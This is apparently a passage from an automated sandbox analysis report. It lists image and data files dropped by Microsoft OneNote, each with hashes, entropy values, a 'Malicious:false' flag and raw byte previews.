                                                                                                                                                                                                              Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......k....".......................................2...........................c.....TUb...Sa...QRqr..............................!.....................Q...R..!..............?...$.)m.1...%%bV.J..H....-.%a[...I"WJ..:.X.:TT.$.......N.-NR.E..-NR.E...9..E....$.k.....B.I,I)..J...kr..+)..I,Yj..YbI..+,J..e..Z..V.e.$V..TV.X..V.YQZ.EQ..U%PY[.[.R.EP............................| F.. ...j*...!m.!j.I%.j.$...YeEYYEEUE..eY[.hEEUeEil.....%..el...V..TUYA.U.UTTUT.Z..UQQUQE...V.,...UlE.U[.lEP.P.@......................................R1...AR1m.....#..$:.T.p..IJ.t.....A..AH.,5..]F!a.XJFaa. ..a.!*.aa. X.e.......bB.b..,HX[,!..,,.c0.,..U..X..(,,...B(.,..4..B.`..".a..-......"...........................>D..IKEb...t.....)u.....)K.%+L\.J]i)*b.JR.IIL\i)u....T............T.....qs.it.iJ...])ZJb.....X....U.A...V1..B.R1....X...,.c...,%X...,%#0...,H
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.377578714449312
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:qscy9ULUPeC6v9JEShaXTiq9xF2RQyRdHh94:qsz9ULUH02dXd9xYRJRph
                                                                                                                                                                                                              MD5:9DF2148C1ED2D36D8D3260A5CC44F46A
                                                                                                                                                                                                              SHA1:BB3BD95106A3CCB856720F6916F77DC77D761506
                                                                                                                                                                                                              SHA-256:F9FB24F01231CF5E41B6EAA3CEC525B5A2BE6E0D1ECDE4F8141B918706DCE042
                                                                                                                                                                                                              SHA-512:9D5128331A024720F251DD1B9EA18E915F9AB768AA1684598E8313901724CC64136E0CED875013487216B03163BD85FACE3FB360EFFC7CC469769E117CE89A94
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......T...v...H...................................................................................................................................2...>...0.......v...|............................I.......I.qk..B.....LZ.............V7........=.....V7........=.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............G..................N...^......................I...1.U..........f........................................I.qk..B.....LZ.............G.......................G......................................................................................j.......T.]..............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4........................#...............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 613x144, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):29187
                                                                                                                                                                                                              Entropy (8bit):7.971308326749753
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:RwjBOlCk+nYnGagKJWJhwMJiRO22ZIm4VXvXx1tA6BQs:i8snY3JW7uROlEfbtVL
                                                                                                                                                                                                              MD5:DF99CAAAB9A7DE97B63343E60A699AB6
                                                                                                                                                                                                              SHA1:B84334135CFB73BC6EF55F85926770D5AC6DFEA8
                                                                                                                                                                                                              SHA-256:74C131777E7C437FD654427417097BC01B0813BA8E1E50E4B937BD50A1BEBCDB
                                                                                                                                                                                                              SHA-512:5D15AAAA8B71DDFE01A7C0ADE16D9E1F5E9AAE484BCD711B38CCB103ED9564CAAC23A0031471167B660E15972D70179C2A387509B213C05D60261042A0456025
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H.....C....................................................................C.........................................................................e..............................................`.............................!1Qq...2ARa..."#.....3BSbr...$4C...Tcs......%&DUd...E....56Fe....................................H........................!1Qa..Aq..."b....2R...BSr..#...3..Cc....$%4...............?...b.d.8T1.;#.S.DO...~.R.......3.xe...z.6..."m..k...;*.'.f.5^.....m..<$....8.R.j.D.v..>...*dT..vGbt...I......sEWp.r3.. ..G...6.....w...l.S..q...b.....-R....^Zu5+u6...A..Z].:...5..Uzn.,l.L.....?%.*.S.+zVg7.=.s.Q.....8..:,c.......ZE...>'IF..W.0.d.......c.e.d.V.t..S$.DNR.[....g..#i.$. .U.SK2.....k...J5u u\R.....T.[4..A.O..,.T..................] .i...B.m.^f....._...{S.....<......:..|D...+...NA....Y.^f.1|..%K~1..B..^...S..v=.c..g.tX[..kTJ..t.gr....R..@.F....5j..2.K.9..g.1N.....*.U...^w......>+.l.v...@N....%Qd...t.Ni.....0;lggm...K".+!.,.....[J...>..?f.]._;
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.35288400020304
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:pWsvdb/Nt+yEYY6gXM968RQy6r1rHA1XSe:pWsd/yxfXM968RJ6
                                                                                                                                                                                                              MD5:09DC133B824C60DBCD32A6CDCA658CB1
                                                                                                                                                                                                              SHA1:4F60CBAF2A0A0CD5B4575F8EAF5A6740BB39F46D
                                                                                                                                                                                                              SHA-256:79BD7D4C40D33063F5D3BD985998F7E79D8C5A6625D14E156C27ECA214BD1240
                                                                                                                                                                                                              SHA-512:5FA3E9B5FCD1D67EECDB66C1AD58E3D8E40CC97F40D44A8076F6EC5D0FEC2023E22B59F9EB34B3ECEC688CF00A4CBB857C194ECF9B57A67EB5B071AA04F9D4A3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ.........P....=..DC.F..P....=..DC.F....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............G8....'......QG.....N...^................p,..F4L..$X..3........f........................................I.qk..B.....LZ............G8....'......QG.........G8....'......QG.....................................................................j......T.].............B....H........B......>.)....J...................;........4...4...4.."........................z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4......................#..............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 276x139, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4819
                                                                                                                                                                                                              Entropy (8bit):7.874649683222419
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:/hnQiz+ET2/hDi+tv34VtpWfowTHgegb6hhLT1NTS:5nQ6TAhLtvIzMvbi6hhF0
                                                                                                                                                                                                              MD5:5D6C1F361BC04403555BE945E28E53FC
                                                                                                                                                                                                              SHA1:00C254F7B3BC0289590C2BBDBB39C8EC2E2B2821
                                                                                                                                                                                                              SHA-256:131D637CDC5D0B094FB9FAD17F4D2A1ACE0D03613588155AACAA2D1CB4E16DA9
                                                                                                                                                                                                              SHA-512:34D2C0929FCC3CC10D0A2121BD55BFA9A07062C2A7B8F101071164C946895DBCB2777641E79DE4193D57A3F0778DD4F1351FAF333B7E4B4DBE31A32DD69C51F9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......................................<........................!1..AQaq"...2B...#Rb..r..$3CS.cs..................................................!1A............?.............u....p.p($.Y...9,j...V.*..S86yh.G.#m.5..9...6Y.."C.R:.[..-.7U3c:..].;.....f.?%..<T...&F.Lh.N...m]..x.D.g<B.....k..S........>j.K....#U..Z....<e.:..8....o..xq.[..4v..U..y...k... k....A#..A...pn.jJ.I.7:..{.b..ns.t,...8.Td.I....m.I.5Z.).-.. ]..X.Do%.....?..4jV.`llt.E...5...u.|..\F.=.F.r<...5dV....xc.%..&...4,...f...3..H.<......eQ...P.J....7...lLc..?..-.fR..7.#.6.......}:.]'.ny..........e;u.Y..$0...i..-....f..9(....}..T,.Inb...+=Cca7....WULA1@.s...4uY5.N.f.c..].ks.....3v..~..k..m)...f gNE`S......#.....Z..6.uc.m...#k.s.f*.l.$6..?..xC.Cm.`...N2..&H...._.&.E...[....f.Z./...!.a{K..#.V.5..v.B....1...9..B.&....%s.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.373818341555194
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:GsagTTZGEgmtjLmGEnV5DNXAq9yzoJrdQqr6zBXhUFCkAno4FSfqW:Gs9ZGEgmYGEVVNXB9cARQyk/W
                                                                                                                                                                                                              MD5:4F6BAC604DF1B4D7ED9C584B178BB407
                                                                                                                                                                                                              SHA1:262443FE80862E68E9ACDC8DFFC6198C3E46399D
                                                                                                                                                                                                              SHA-256:264905ADFA3E0A8B4C2DCF9EC082A35545745B46315201CF562DD7572AD3728C
                                                                                                                                                                                                              SHA-512:54E91701674E7CD31EA57B825E5FAD938983197ED7E87CC408864BA0853938E6080FCB80E0D03751A1DD3540CEDDF021789538053DE6909007219C93B3314E7B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......V...v...J...................................................................................................................................2...>...2.......v...~...........................=.......=..U....?.i...yz.I.......I.qk..B.....LZ=..U....?.i...yz=....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............|My...%.d}......N...^..................i.u.@.(....x+........f........................................I.qk..B.....LZ..............|My...%.d}............|My...%.d}...........=.......=.......=...........................................=..j....=..T.]..=.......=....B..=..H....=....B..=....>.)=....J...................;........4...4...4.."..............=...=...=....z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........=.......=......#=..............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 814x45, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1717
                                                                                                                                                                                                              Entropy (8bit):7.154087739587035
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:N9YMzO6BOfqH/dAIWpdAIWpdAIWpdAIWUtr/SD:/hzJgfqHaPYPYPYPUt/i
                                                                                                                                                                                                              MD5:943371B39CA847674998535110462220
                                                                                                                                                                                                              SHA1:5CA79B7BD7E0E93271463FAEF3280F1644CBA073
                                                                                                                                                                                                              SHA-256:9C552717E8D5079BBB226948641FF13532DF3D7BE434C6CE545F1692FA57D45A
                                                                                                                                                                                                              SHA-512:812541836C8B6F356A4D530E5CCF1CFDCC4CA54AF048CAC19FE86707CE5EA0F41D73C501821AC627AD330291EF58C040DFC017923A7886CEEC308048DA2CE7C9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......-...."........................................&.....................U.....1T..S.R.Q.................................................R....Q.a............?..d.. ...............................................+A...Z+E...V+E...U..R.....}........Q..Ah....Ah..b.AX..b.PZ+A...V+E...V..J*....Q...b.Q..Ah....Ah..b.Ah..b.PZ*.(.@z.?.`;2.......................................................Q...b.Q..EZ*.(..Z>.G.....`Z+E......J*....F+D...F+E.......b.Q...h....PZ+E...V+E......J*....F+D...F+E..............[u#...a-...f<.9^[...l0..H..6.Kn.t...&..3a...GG...[u#..8.y6.q..%.R:8....6a.+.3..a-....l0..H..9^M..f..m..3a...GM.q..m..6.Kn.tq..%.R:l.W.lg...[u#...a-...f.r..c8.....f..m..0.....l0..H..6.Kn.t...&..3a...GG...[u#..8.y6.q..%.R:8....6a.+.3..a-....l0..H..9^M..f..m..3a...GM.q..m..6.Kn.tq..%.R:l.W.lg...[u#...a-...f.r..c8.....f..m.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.310103954024125
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:FdSsWBsWjantnMEKd793Xj99s3EoksrdQqrTdeaUBXEt1Id2E3/sg:FdSsPWjKCEKd53Xj99sUcRQyIaUsrSs
                                                                                                                                                                                                              MD5:16D677191F1D6192ABA22932F86E6CAF
                                                                                                                                                                                                              SHA1:63C4496574C32F63A3AF1BB6A9EFB8532F64693E
                                                                                                                                                                                                              SHA-256:86F11C8FA8226D25EE6BF45E44F36F1EE4D0746EE0CF17E79E6BA84E9588679B
                                                                                                                                                                                                              SHA-512:7FBEA322CA3C081138FBBE59AAD2206C036EC43D8927B23083AA631CAC1C0D8898B5A19135F173A34576959021869821AEC008308E414E98DFCEC7C1B088888B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......T...v...H...................................................................................................................................2...>...0.......v...|............................I.......I.qk..B.....LZl.......l..L....6..lm..l..L....6..lm..l....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............x...........=.b....N...^................a_.2.lC..8..:.x........f........................................I.qk..B.....LZ............x...........=.b........x...........=.b.........l.......l.......l...........................................l..j....l..T.]..l.......l...B..l..H....l....B..l....>.)l....J...................;........4...4...4.."..............l...l...l....z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........l.......l......#l..............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 262x277, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3555
                                                                                                                                                                                                              Entropy (8bit):7.686253071499049
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:/h3JeYCQV5Hn++9HBdAjU78S/mjLLwqnqahJD:53Je8b+EBdAjm8S/mjLLRnphJD
                                                                                                                                                                                                              MD5:8A5444524F467A45A5A10245F89C855A
                                                                                                                                                                                                              SHA1:ACE68D567B02B68275E0345C86DB1139C0EC1386
                                                                                                                                                                                                              SHA-256:7D2B01F17354D9237A6AB99D5B9AFDF0E1CC43687125848B0C2DEDFB44CE3843
                                                                                                                                                                                                              SHA-512:8151B447B60D110C32EC1EF286B941FFC09B99140F41BBACF5A1650A385FF4D13C0DDB2878E9A470FC7CFCC95A1AB6E44F6DE72562B0FFE093DC8A3C3C7FCC14
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......................................2........................!1AQ.a."2q.B..#R...3C................................ .......................!1.AQBq............?........)&vD.)3Hn*..X+....r...tmL.k..(.E...R. .Z..&...,fJ...!...6..S\t3.=...g&..Bqe.)_U.....1......-..fl.................J...u.i.mU..K..v.w.0O..E.h..D~K.(..9.,8..E.}.............i.\.....t."v..q..C............<..|3.........................*Q..../c.....f.}8....D..|k..Z......0..~..c..e..m(...|.c..'.5.5............==bx.5x.8...T;....=.--.pc...I;.V.m..,(....}...NH.ho....Q..U.E$.~...w.t>.S\....'f.{.+.g._.t....;>.....P...........-..G.h..2...J.% !.E97Ir.D..N....j...oE._...._...".?.......#".S.........Q.Tc.I..*I..k.......=$.........sk1Jp.\K.....F.3.Q..q..J....N..[l.&....OR4bB|..2ul....J...B.$&H..9#j.f.n./........?R~....B.I.@..........m
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.331273300403996
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:ws0gH+pCnwEFLX0LL9MzQRQyEe9Ho3gSJP:ws2pcFLXwL9AQRJp+
                                                                                                                                                                                                              MD5:D0BEDA14E4457B5962C99C9E7943BAF8
                                                                                                                                                                                                              SHA1:2A9D62697E2C5F88D77CE68D7B2C38E4CD6C5D6C
                                                                                                                                                                                                              SHA-256:636B1C8B19843C2B7CDB29E91B05373B845E2B18ED1D546504B1197B6F6FF056
                                                                                                                                                                                                              SHA-512:0DE8FA5138F1A41206BFF3F7F46C9C42634EE1370C9B9A166A9AF0E65C10CEDEEFEDC0A76340EBFF1455A762763795D32788595685E2F73409F2852F8787BC07
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ|.......|..7.....T|$...|..7.....T|$...|....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............x.'V.m.".?..W......N...^...............8.T2..C...9.'.........f........................................I.qk..B.....LZ.............x.'V.m.".?..W...........x.'V.m.".?..W...........|.......|.......|...........................................|..j....|..T.]..|.......|....B..|..H....|....B..|....>.)|....J...................;........4...4...4.."..............|...|...|....z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........|.......|......#|..............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 70x626, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3428
                                                                                                                                                                                                              Entropy (8bit):7.766473352510893
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:/hdu7isPwAp7zesusUyYAatNG87llTONQYS:5di5tfuQ9atNZlaC
                                                                                                                                                                                                              MD5:EE9E2DF458733B61333E8A82F7A2613D
                                                                                                                                                                                                              SHA1:A86704C969F51B86D6A05ED51C6C60214ED9FA89
                                                                                                                                                                                                              SHA-256:BE4F0E6C89FCE91B9EBD2623567F7DFC259E0E3C77C9158742B8F64B724DF673
                                                                                                                                                                                                              SHA-512:BFB5D6DD6B66EE21E946E90D1E482384CD10244308562DDA814189602681DADDE5752B80519E5B8515F115A71BD6BB4317A59BE65B8B5E3474AED119F8303569
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......r.F.."........................................H............................!Qaq.."12.....#3ARbr...$B...cd...&CSu.....................................+.......................12..aAQ.!#q.."................?...#...3.Za......rV.5&...../"..i.t...j..W........d.FL.V.2K....]t.f.d.NK..:.....f...... ......2.[...#..D...ZK....p.z.E.N..T..L.-....1....2.\.6FIr2..zS\U#..........fB\t..5J..~q...D....A.......!....MY..../.HY..../e.M.Y.n.~..,....'..Pc...l...d2..m.f.it$..qx-z*...._..].cOO....n..&.....FIA.....2J2..d:<qc..6.I.G.N....f.K..Dx.-.......`....2.FZ."K7.r}..<.P.Z.da.Y.....8..s....G.....b.e..g .S.......FL.Z,&..q.MG.J+..x\..m...qN=.....)..`...&Y...S....u6{.z.g.....@......FL.ZL&.Iv.w..8....U..v...*.q.B.v_./A..#.#.g.j........*J;...u...W.Ao...%....#$.....M..^\{W.SO...s,.N.....c).,.B.Gv...."k..z."..S]H.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.330057560603714
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:SqqRsB9X+R0XmteZ2EXNrx7N9Xw9qqo9rdQqrlYBXSQ9g7WF:ssqRgmwwEXNrxh9Xw9d0RQyOH
                                                                                                                                                                                                              MD5:5D7CFA566DE4ED63110BEC0C405E92CF
                                                                                                                                                                                                              SHA1:1E7BE504DF5C29CC7F1F117AC1A3B7211DB376D8
                                                                                                                                                                                                              SHA-256:118F61F2E99FC0BA5A3302C1332858D91E6857923B79F816C48C163409769CA2
                                                                                                                                                                                                              SHA-512:5FC21861E8DE6DA4987A5D27A3F92E910EAC1800B6C465E653A2E326E4C5C07ED96AAA33661D13EE5B434B3CDF264F9860CB124261569EB4021F411A437479BF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ."......."...... .q....G."...... .q....G."...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............V.DqT3..R....^N....N...^.................Y.A.C._T.M..........f........................................I.qk..B.....LZ.............V.DqT3..R....^N.........V.DqT3..R....^N.........."......."......."...........................................".j.....".T.]..."......."...B...".H....."...B..."...>.)."...J...................;........4...4...4.."..............."..."..."...z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4..........".......".....#.".............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 177 x 123, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):65589
                                                                                                                                                                                                              Entropy (8bit):7.960181939300061
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:2Hlrjw3xL//DPgff+9j6yPWvHMHjkbfnwHO3AW3GL:2H2zDUU+yPVHITwNfL
                                                                                                                                                                                                              MD5:8B48DA9F89264D14B83FF9969F869577
                                                                                                                                                                                                              SHA1:E1BD58E2D80FEEF56DC514F3F0B3AB9669F22F95
                                                                                                                                                                                                              SHA-256:62AD3C277E54F03F1ADB44062407346F789E63859B7AFABFD64BE6AF5E9F66EC
                                                                                                                                                                                                              SHA-512:03B783EC968DF3F648504D068D64DD1AE110E28110FE5B3401C9D04F44897DBE0CBB5680D42CA4C665FA94A6CED4B559106EB3C06C9BF2C5B14951ECBFFAC8AE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR.......{.....;Za.....sBIT....|.d.....pHYs...........~.....tEXtSoftware.Macromedia Fireworks 8.h.x....tEXtCreation Time.05/15/06.8.p....prVWx..Y=.+I....t.y...,^vv....;. "|. .i7.....$.2g..']pH@p..]b....H.H.......d'@ B...U.xm..3{3k?..5n.._}U...3......~..>...g.....f..t...t:...p>..Si..d:..k:.Lf..t6.K.i....d<...x.8\.8.+lc...)i.$.r.....x.t.BG.R.cm.c...p.:&.6.4..K.......^...~b].0....oBYv..u.'.=.K.Q.g)6.....4.!.M......4.=....G.%.Sr........nxC.F..t.U........1...J.t..eQ....".... |...81.$D.!.>...........$...^.vY..EY8tb..'.P.g#O....S*..0'.V....x.W..........k.......s.C.S...J%.iVb..].........3....j.}*.z....+.s..@..K.....\x.C..e.Qq.....;N.....;....,....^.*..$F..{G...8.#....8'..&....8..5.....3(P._....S......|".....u.cr....+a-....&V..x...iI-<|a.{E.c.X.......?..&.C....'........(.x....>...M.?.9..#X......l...0...Z.F..<.z.0}Q..Z1..........?h..`E$K.2o.A*c^.......*..D..uL=.}.#*0.. M!.A.C......|_..(.Y........!E... .O...`;....M+..x.u~g...q>...N."D^..K..x..D.`.!.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.395580740068351
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:gbsvNr/VpzEmdy3X7t94cRQy2+RcFLuMR8xe:ysvNr/VCmE3Xh94cRJ2+RcFLuMR6e
                                                                                                                                                                                                              MD5:9957631BE6F08FBAB095A156C5ED7E63
                                                                                                                                                                                                              SHA1:C18C7BF0C8BF5C5C425F1D89482CCF48423B1190
                                                                                                                                                                                                              SHA-256:D1B8D685A59254A7F4E048B6AAB3A12B4C669B2C0A889A2CC58D66C39FE130F7
                                                                                                                                                                                                              SHA-512:8F610D32D8FD7D8A9CE9B92F32457D37B0CFB684E81F7815704A6AEB6A86E4B386F05A873188B1659D303CC63AF2BC48811D6F2E4C038AC85916516F169B96AA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......V...v...J...................................................................................................................................2...>...2.......v...~............................I.......I.qk..B.....LZ.N}......N}6.].?....z.N}6.].?....z.N}..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............o.L(.\.%}%...3.....N...^...............`.9...G.$...c.:........f........................................I.qk..B.....LZ.............o.L(.\.%}%...3..........o.L(.\.%}%...3...........N}......N}......N}..........................................N}j.....N}T.]...N}......N}..B...N}H.....N}..B...N}..>.).N}..J...................;........4...4...4.."...............N}..N}..N}..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4..........N}......N}....#.N}............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 17x608, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1873
                                                                                                                                                                                                              Entropy (8bit):7.534961703340853
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:N9YMw9kGzE4xTdow1C3kyIkyM66KeJY3fOxJ:/h8HzE4xTdoUCUyxyD6LCvSJ
                                                                                                                                                                                                              MD5:4FC8500BD304AD127AF4B5E269DFF59B
                                                                                                                                                                                                              SHA1:9A5E3432358A0FCDECE86AEB967319B93A65D14A
                                                                                                                                                                                                              SHA-256:B4DAA90D5A53FCBC85119050B5B76962443C4DD18D7F42CDC6D4E0AD8EFAD872
                                                                                                                                                                                                              SHA-512:E5E07054A522EB91EFD39722AFB3776389632B8F5F923C1D29796716D68CEC93BE5E44F79913804CEC7ED631FF520CBBBAAB841E01FB90AF8E8ADF84DCD47481
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......`...."........................................>.......................tu.....45.!#$%1s."fr...2Fq..AQe.Eav............................... .........................!AQR.............?..e4.bbu."m.G......u.S.-Qq.b.a..'#..E.......u.|:.f[O..jS.S.&....=.....[.....S...N.~~...'...q....N.T.Oyf..a.6..%.I.1j.e~.4..[5.WW.Y..Xp.gn...u.......Gb.O.W..k.!mJgfq....~.F.......m..}bn4.5........s,F...z.b)..O..*...5).-.-\....=`.fP....%...A..Q.&..9.....QQbD.%.:u.f...r$.10..W.F.T..MI...9...ZQH._..).....D..n.F].........*.:.j...!6Z..S....0...B.6..Ga..S.O.....U8S_.J.>...i..?..<.P..........M..F.T.C..7.E...`.4BKcMh1j....4y...+.|.^......2[.WG.W..+......E..r/V^".R...."..6..hht..f...........;E..Kx....)}Le.A.x.>..$/).._S.n.L......}..H^Sw...2. .v.io...../.........x.>..$/).._S.n.t^;O.....n...[.S...h.v.io...../....:/...[..7yK.c-
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.465434105355137
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:1sBsWlcmScAflo/cetUEe/X69TOSogsrdQVrum/BXpqXkDFMCIS:CsWMcoaceWEEX69T5sRQ5dmK6C
                                                                                                                                                                                                              MD5:6E6C2BBC84AEFE131BA06D47C448414F
                                                                                                                                                                                                              SHA1:6100A61F89F3492CC806FB67EC19569FB78D43BE
                                                                                                                                                                                                              SHA-256:3911AF0002853BD9E48D4A323CAD47DDDEF2804A1F6ADFBAE05BD4CFFE6C618F
                                                                                                                                                                                                              SHA-512:C1DEF61392B2D933B6F30C55BBB95828B1BBC92AACB051222FEC747647CEB6DF825313B2BAFEF794B5B9978FFA71D2B167F060A343AA51341A34C034BCA69814
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......n...v...b...................................................................................................................................2...>...J.......v................................I.......I.qk..B.....LZd5......d5...... *ii.Av.d5...... *ii.Av.d5...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............DD......4..........N...^..................D.z.I..(..Qv.........Z........................................I.qk..B.....LZ.............DD......4...............DD......4...............d5......d5......d5..........................................d5.j....d5.T$c..d5......d5.G..d5...H..d5...>..d5......d5. .3...................;........4...4...4.."..............d5..d5..d5...z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........d5......d5.....#d5.............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 357x69, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5465
